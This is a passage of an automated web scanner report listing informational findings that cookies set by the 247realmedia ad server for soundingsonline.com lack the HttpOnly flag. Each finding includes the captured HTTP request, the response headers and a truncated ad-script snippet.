document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/293324580/Middle/
...[SNIP]...

14.328. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1117083037@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1117083037@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1117083037@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:57:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4537
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2067819938/Middle
...[SNIP]...

14.329. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1118187308@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1118187308@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1118187308@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:58:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4574
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1201687724/Middle
...[SNIP]...

14.330. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1128492533@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1128492533@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1128492533@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4269
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/781217496/Middle/
...[SNIP]...

14.331. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1133836899@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1133836899@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1133836899@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4624
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1714346640/Middle
...[SNIP]...

14.332. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1139218526@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1139218526@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1139218526@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:57:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4263
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1816417247/Middle
...[SNIP]...

14.333. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1167274727@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1167274727@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1167274727@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:55:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4328
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1303798805/Middle
...[SNIP]...

14.334. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1209535023@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1209535023@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1209535023@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:58:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4511
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1881531045/Middle
...[SNIP]...

14.335. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1216110988@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1216110988@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1216110988@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:52:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4562
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/970246968/Middle/
...[SNIP]...

14.336. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1225562716@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1225562716@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1225562716@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4808
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1077268478/Middle
...[SNIP]...

14.337. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1239081530@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1239081530@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1239081530@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4571
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2095119772/Middle
...[SNIP]...

14.338. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1241424720@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1241424720@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1241424720@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:54:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4510
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1730348108/Middle
...[SNIP]...

14.339. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1251933878@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1251933878@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1251933878@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4566
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/476095038/Middle/
...[SNIP]...

14.340. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1264761221@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1264761221@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OAX=rcHW800+NG4ADRRy; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.341. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1271414808@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1271414808@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1271414808@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:57:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4575
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/133479354/Middle/
...[SNIP]...

14.342. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1273853013@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1273853013@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1273853013@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4573
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1958452740/Middle
...[SNIP]...

14.343. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1280349904@Top,Middle,Right,Right1,x01,x02,x03,x04 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1280349904@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1280349904@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:55:35 GMT
